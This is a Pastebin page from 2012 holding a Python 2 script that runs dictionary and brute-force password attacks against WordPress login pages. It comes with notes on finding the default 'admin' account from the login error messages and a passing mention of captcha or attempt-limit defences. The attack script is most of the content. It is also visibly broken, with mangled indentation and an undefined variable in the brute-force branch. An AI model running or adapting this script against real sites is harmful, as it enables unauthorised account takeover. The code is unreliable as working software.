API tools faq
paste
TrojanSpot

Wordpress BruteForcer Attacked | www.pemula.info

TrojanSpot
Oct 28th, 2012
307
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.59 KB | None | 0 0
raw download clone embed print report
  1. ############## Source code #####################
  2. #!usr/bin/python
  3. # Flaw found on Wordpress
  4. # that allow Dictionnary & Bruteforce attack
  5. # Greetz goes to : NeoMorphS, Tiky
  6. # Vendor : http://wordpress.org/
  7. # Found by : Kad ([email protected] / #[email protected])
  8. import urllib , urllib2, sys, string
  9. tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits )
  10. tab = [  i for i in tab ]
  11. def node( table, parent, size ):
  12.     if size == 0:
  13.         pass
  14.     else:
  15.         for c in table:
  16.             string = "%s%s"%( parent, c )
  17.                         data = {'log': sys.argv[2],
  18.                                 'pwd': string}
  19.                         print "[+] Testing : "+string
  20.                         request = urllib2.Request(server, urllib.urlencode(data))
  21.                         f = urllib2.urlopen(request).read()
  22.                         if not "Incorrect password.</div>" in f: print "[!] Password is : "+mot ; break
  23.             node( table, string, size-1 )
  24.  
  25. def bruteforce( table, size ):
  26.     for c in table:
  27.         node( table, c, size-1 )
  28.        
  29. if (len(sys.argv) < 3):
  30.     print "Usage : float.py <server> <user> <choice> <dico-characters>"
  31.     print "\nDefault: User is 'admin'"
  32.     print "Choice : 1} Dictionnary Attack, use dictionnary file"
  33.     print "         2} Bruteforce Attack, use number of character for password"
  34.    
  35. else:
  36.     server = sys.argv[1]
  37.     if sys.argv[3] == "1":
  38.     a , b = open(sys.argv[4],'r') , 0
  39.     for lines in a: b = b + 1
  40.     a.seek(0)  
  41.     c = 0
  42.     while (c < b):
  43.         mot = a.readline().rstrip()
  44.         data = {'log': sys.argv[2],
  45.                 'pwd': mot}
  46.         print "[+] Testing : "+mot
  47.         request = urllib2.Request(server, urllib.urlencode(data))
  48.         f = urllib2.urlopen(request).read()
  49.         if not "Incorrect password.</div>" in f: print "[!] Password is : "+mot ; break
  50.         else: c = c + 1 ; pass
  51.     if sys.argv[3] == "2":
  52.     print "[-] Server is : "+server
  53.     print "[-] User is : "+sys.argv[2]
  54.     print "[-] Number of characters are : "+sys.argv[4]
  55.         number = int(sys.argv[4])
  56.         bruteforce( tab, number )
  57. ############## Source code #####################
  58.  
  59. The problem is : many time, the default user who is created is : admin, then you can try to crack the password, to stop that, you can use image confirmation or a limit for the connection (for example, only 5 tests).
  60.  
  61. To know if "admin" is the default user, you can try to go to the login page : http://site.com/wp-login.php and you try ; login : admin, pass : test (or anything else).
  62.  
  63. if "Wrong password" is printed on the page, the default user is admin, but if there is : "Wrong Username" then it's not the default password ;)
  64.  
  65. Kad'
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!